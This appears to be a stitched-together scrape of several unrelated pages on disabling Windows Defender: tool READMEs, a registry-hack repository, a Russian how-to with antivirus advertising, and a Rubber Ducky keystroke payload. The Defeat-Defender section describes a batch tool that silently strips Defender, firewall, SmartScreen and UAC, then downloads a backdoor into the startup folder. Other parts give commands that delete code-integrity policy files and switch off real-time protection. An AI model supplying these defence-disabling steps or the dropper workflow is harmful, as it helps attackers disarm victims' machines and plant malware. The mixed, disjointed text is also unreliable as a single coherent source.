❌️ Defender Remover / Defender Disabler
❓️ What does the app do?
This application removes / disables Windows Defender, including the Windows Security App, Windows Virtualization-Based Security (VBS), Windows SmartScreen, Windows Security Services, Windows Web-Threat Service, Windows File Virtualization (UAC), Microsoft Defender App Guard, Microsoft Driver Block List, System Mitigations and the Windows Defender page in the Settings App on Windows 10 or later.
🖍 System Requirements
- Windows
8.x
,10
and11
(all versions).
📃 Instructions
Note
A system restore point is recommended before you run the script.
- Download the packed script from Releases
- Run the «.exe» as administrator
- Follow the instructions displayed
Please file an issue if you experience any problems.
📃 Automation of the script
You can disable or enable Windows Defender with arguments.
Enable/Disable Windows Defender and Security Components
# ENABLE Defender.Remover.exe /r <# or /R #> # DISABLE Defender.Remover.exe /n <# or /N #>
Enable/Disable Windows Defender Antivirus only
# ENABLE Defender.Remover.exe /e <# or /E #> # DISABLE Defender.Remover.exe /m <# or /M #>
Disable or Remove Windows Defender Application Guard Policies (advanced)
If you have any problems when opening an app (extremely rare) and get the message «The app can not run because Device Guard» or «Windows Defender Application Guard Blocked this app», you have to remove 4 files with the same name, from different locations.
- In EFI Partition
Remove-Item -LiteralPath "$((Get-Partition | ? IsSystem).AccessPaths[0])Microsoft\Boot\WiSiPolicy.p7b"
- In Code Integrity Folder
Remove-Item -LiteralPath "$env:windir\System32\CodeIntegrity\WiSiPolicy.p7b"
- In Windows Folder
Remove-Item -LiteralPath "$env:windir\Boot\EFI\wisipolicy.p7b"
- In WinSxS Folder
Remove-Item -Path "$env:windir\WinSxS" -Include *winsipolicy.p7b* -Recurse
❓ Frequently Asked Questions
⭕ Why is the downloaded executable being flagged as a virus?
That is a false positive.
Some security apps flag this app as a virus because of the way the «.exe» files are created.
⭕ Why is the patch not working when Windows is updated?
Windows Update includes a Intelligence Update
which blocks certain actions and modifies Windows Defender/Security policies.
If the script is not working for you, check if you have the Windows Security Intelligence Update installed. If you do, disable tamper protection, and re-run the script.
⭕ How to use the package remover without downloading the executable from the release?
Run the desired «.bat» file from cmd with PowerRun (by dragging to the executable). You must reboot for the changes to take effect.
permalink | layout |
---|---|
index.html |
default |
Disable Windows Defender on Windows 10
NOTICE: Permenantly disabling Windows Defender is
no longer possible
in recent Windows 10 versions. Instead, you can only rely on excluding specific
folders or disabling it temporarily.
Why?
Windows Defender is infamous for its tendency to monopolize CPU and I/O
resources. Moreover, some of its «security» measures are undesirable and may
put user privacy at risk. This has many practical consequences, such as:
- slower general operation due to increased resource usage,
- excessive CPU usage while copying files, slowing down the entire system,
- increased heat and noise output, as well as reduced battery life on laptops,
- deletion of files detected as «malware» without the user’s consent, even in
ZIP archives or on attached network drives, - user privacy at risk, due to automatic sending of «malware samples» to
Microsoft, - …
Windows 10 allows you to disable Windows Defender in the Settings, but this is
only temporarily effective; it will be automatically re-enabled eventually –
the exact timing for this is random and unpredictable.
This repository contains a «disable» .reg
file which can be used to
permanently disable Windows Defender. But don’t worry, you can revert it
using the included «restore» .reg
file.
Usage
Disabling Windows Defender permanently
- Clone this repository or
download a ZIP archive. - Double-click
disable_windows_defender_on_windows_10.reg
then accept the
administrator and the warning prompts. - Reboot your system.
Restoring Windows Defender (in case something goes wrong)
- Clone this repository or
download a ZIP archive. - Double-click
restore_windows_defender_on_windows_10.reg
then accept the
administrator and the warning prompts. - Reboot your system.
Frequently asked questions
Isn’t it insecure to disable Windows Defender?
With today’s security threats, antivirus software is becoming
less relevant over the years. Many antiviruses are now fooled by malware
executables, and other forms of malware aren’t detected by most antiviruses.
While perfect security doesn’t exist, it still is a good idea to avoid exposing
yourself to modern threats such as ransomware.
To make your computing more secure, consider the following options:
- Block tracking and malware scripts using
uBlock Origin.
This will also make browsing faster and decrease network traffic. - Block tracking and malware domains using
Dan Pollock’shosts
file.
This has the upside of working on all software on your computer,
not just Web browsers.
License
Copyright © 2017-2020 Hugo Locurcio and contributors
Files in this repository are licensed under CC0 1.0 Universal,
see LICENSE.md for more information.
Defeat-Defender-1.2
- If you like the tool and for my personal motivation so as to develop other tools please leave a +1 star
Powerfull Batch File To Disable Windows Defender,Firewall,Smartscreen And Execute the payload
Usage :
- Run
run.bat
and enter the direct link of your malware - Run the script «Defeat-Defender.bat» . It will ask for Admin Permission.If permission Granted The script will work Silently and dismantle all protection…
After it got admin permission it will disable defender
- PUAProtection
- Automatic Sample Submission
- Windows FireWall
- Windows Smart Screen(Permanently)
- Disable Quickscan
- Add exe file to exclusions in defender settings
- Disable Defender Notification (Added Recently)
- Disable UAC(Reboot Required)
- Disable Ransomware Protection
- Disable TaskManager
- Disable registry etc..
Proof-Of-Concept
defeat-defender_W89Khs8L_TvOB.mp4
Bypasssing Windows-Defender Techniques :
Recently Windows Introduced new Feature called «Tamper Protection».Which Prevents the disable of real-time protection and modifying defender registry keys using powershell or cmd…If you need to disable real-time protection you need to do manually….But We will disable Real Time Protection using NSudo without trigerring Windows Defender
Running Defeat-Defender Script
Tested on Windows 11 Pro
After Reboot
Warning
This Script will completely Disable Windefend
Services . And also it is very difficult to revert the changes..Think twice before you run the script
Behind The Scenes :
When Batch file is executed it ask for admin permissions.After getting admin privileage it starts to disable windows defender real time protectin , firewall , smartscreen and starts downloading our backdoor from server and it will placed in startup folder.The backdoor will be executed after it has downloaded from server..And will be started whenever system starts..
Check out this article :
https://secnhack.in/create-fud-fully-undetectable-payload-for-windows-10/
Note :
If you want to enable Defender Smart Screen.Use Smart Screen.bat file..
Discalimer :
Use this only for educational Purpose…Love you Guys Bye…..
Contact :
Inspired From TechChip
Special thanks to Jeffrey-d-howard(Senior Vulnerability Management Lead) For Posting Defeat-Defender on his linked page
❤️Supporters❤️
Дарёному коню в зубы не смотрят, но не в нашем случае)!
В Windows 10 имеется интегрированный антивирус Windows Defender («Защитник Windows»), который выполняет функции защиты нашего компьютера и данных на нём от нежелательных программ.
Встроенное решение от Microsoft пагубно влияет на производительность системы, запускаясь вместе с ней, работает в фоновом режиме, собирая статистику о системе, и имеет привычку обновляться в «удобное» для него время. Также бывают ситуации, например, когда необходимо настроить устройство под себя или установить какой-то файл из Интернета, что, конечно же, «Защитник Windows» будет блокировать.
Тогда перед Вами станет задача отключить данную систему или вовсе искоренить из системы, но есть проблема: полностью удалить или отключить Windows Defender у Вас не выйдет – эта система глубоко интегрирована в Windows 10 и в последующие версии, начиная с 1903 version (С выходом Windows 10 May 2019 Update (версия 1903) Microsoft представила функцию «Защита от подделки», которая предотвращает изменение настроек приложения «Безопасность Windows» и антивируса Microsoft Defender вне интерфейса Windows. Под термином «настройки» здесь также учитываются инструменты командной строки, изменения реестра и групповых политик).
Однако, не спешите отчаиваться, есть несколько обходных путей, при помощи которых мы сейчас отключим антивирус Windows.
Для этого нам понадобятся 2 программы:
1) Defender Control — https://www.sordum.org/9480/defender-control-v2-1/ (официальный сайт) 2) Reg organizer — https://chemtable.ru/organizer.htm (официальный сайт)
Далее по пунктам:
1. Устанавливаем и открываем Defender Control:
2. Нас интересует 3 файл «Defender_Settings». Открываем его, нас перекидывает в «Параметры Безопасности Windows», отключаем все ползунки до самого конца страницы.
3. Далее открываем первую папку «dControl» и открываем первое приложение.
-
В открывшимся окне выбираем пункт «Отключить Защитник Windows», после чего Вы должны увидеть характерный красный цвет интерфейса.
5. Устанавливаем и открываем Reg organizer.
6. В левой панели открываем вкладку «Другие функции» и выбираем «Редактор Реестра»:
Далее просто копируете путь: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender
Вы сразу попадаете в нужную папку, где необходимо правой кнопкой мыши нажать на пустое место, выбрать «Создать 32-битный целочисленный параметр (REG_DWORD)». Далее обязательно называем новый ключ DisableAntiSpyware и нажимаем «ОК».
Затем двойным щелчком откройте редактор ключа и задайте ему значение «1». Проверьте, чтобы все значения были, как на скриншоте ниже.
7. Отлично, осталось немного! Теперь чуть выше находим «Автозапуск программ», заходим в него. Выбираем Windows Security, правой кнопкой мыши выбираем пункт «Удалить и не давать появиться снова». Жмём «ОК».
Перезагружаем компьютер и радуемся отсутствию Defender-а. Победа!
Если кому-то будет полезно регулярное временное отключение, то:
Открываем PowerShell от имени Администратора и прописываем:
Set-MpPreference -DisableRealtimeMonitoring $true
— чтобы выключить
Set-MpPreference -DisableRealtimeMonitoring $false
— чтобы включить
Немного рекомендаций от автора: (к прочтению необязательно)
Несмотря на возможность отключения Защитника Windows, автор статьи не рекомендует использовать компьютер без антивируса вообще. Будет хорошо иметь на своём ПК антивирусное решение или хотя бы раз в месяц использовать » Полное сканирование системы». Для избежания проблем, советую обратить внимание в сторону отечественных ПО: Антивирус Kaspersky, Dr.Web и NANO Антивирус. Первые два антивируса входят в «Реестр отечественного ПО», а третий, в свою очередь, – «Единый реестр российских программ для ЭВМ и БД».
Пройдёмся кратко по каждому:
1) Dr.Web:
Российский производитель антивирусных средств защиты информации. Продукты Dr.Web разрабатываются с 1992 года. Это один из первых антивирусов в мире. Компания «Доктор Веб» — ключевой игрок на российском рынке программных средств обеспечения базовой потребности бизнеса — безопасности информации.
Стоимость: от 1209 ₽ в год (1 ПК + 1 Android)
Пробный период платной версии: 30 дней, (без техподдержки и защита только 1 ПК).
Также имеется Dr.Web CureIt! — лечащая утилита «Dr.Web CureIt!», которая не является постоянным средством для защиты компьютера от вирусов, но способна вылечить инфицированную систему однократно.
2) Kaspersky Total Security:
Стоимость: от 1709 Р в год
Пробный период платной версии: 30 дней
«Лаборатория Касперского» — международная компания, работающая в сфере информационной безопасности и цифровой приватности с 1997 года. Глубокие экспертные знания и многолетний опыт компании лежат в основе защитных решений и сервисов нового поколения, обеспечивающих безопасность бизнеса, критически важной инфраструктуры, государственных органов и рядовых пользователей. Обширное портфолио «Лаборатории Касперского» включает в себя передовые технологии для защиты конечных устройств, ряд специализированных продуктов и сервисов, а также кибериммунные решения для борьбы со сложными и постоянно эволюционирующими киберугрозами.
Помимо платных версий, имеются полностью бесплатные решения. В полностью бесплатной версии доступно:
· Помогает обеспечить безопасность устройств
Решение Kaspersky Free оснащено передовыми технологиями безопасности. Оно автоматически анализирует новые угрозы в реальном времени, помогая защищать компьютеры, мобильные устройства и планшеты, в том числе iPad.
· Бесплатный антивирус и не только
Kaspersky Free – это бесплатное антивирусное решение, которое защищает компьютеры с ОС Windows и мобильные устройства Android от вредоносного ПО, зараженных файлов, опасных приложений и подозрительных сайтов.
· Безопасность без замедления работы
Система безопасности защищает устройства, не мешая вашей работе. Kaspersky Free получает обновления автоматически, благодаря чему у вас всегда будет актуальная версия антивируса.
3) NANO Антивирус:
Стоимость: от 799 Р в год
Пробный период платной версии: 30 дней
Компания NANO Security создана в 2009 году на базе коллектива высококвалифицированных специалистов, работающих в области антивирусной безопасности с 2003 года.
Главной идеей проекта было предложить основанные на тщательно изученных предпочтениях пользователей и клиентов программные продукты, выгодно отличающиеся по ряду параметров от антивирусных решений других производителей.
Сегодня NANO Security представляет собой команду профессионалов, обладающих высокими компетенциями. В компании работают опытные эксперты в области информационной безопасности: программисты, аналитики, тестировщики и т.д.
Надеюсь, статья вышла для Вас полезной.
Далее планирую написать про хорошие антивирусные решения, которые продолжают на сегодняшний день работать/продаваться/обновляться на территории РФ.
Payload : Disable Windows Defender
Date 05-11-2021
Target : Windows 10 And Windows 11
This Code Was Tested On Windows 10 OS build 19043.1288 And Windows 11 OS build 22000.282
Note : Older PC’s May Require More Delay.
This Code Can Also Combined With Other Ducky Scripts.
REM Author : @krishnachaittanyah
REM This Script Will Disable Real Time Protection
REM *********************
REM We're going to disable Real Time Protection
REM *********************
DELAY 1000
GUI
DELAY 500
STRING virus & threat protection
ENTER
DELAY 3000
TAB
TAB
TAB
TAB
DELAY 200
ENTER
DELAY 200
SPACE
DELAY 3000
ALT y
How do The Following Scrip Work ?
First, This will search and open Virus & Threat Protection Tab
and then it will enter into manage settings disable Windows Real Time Protection.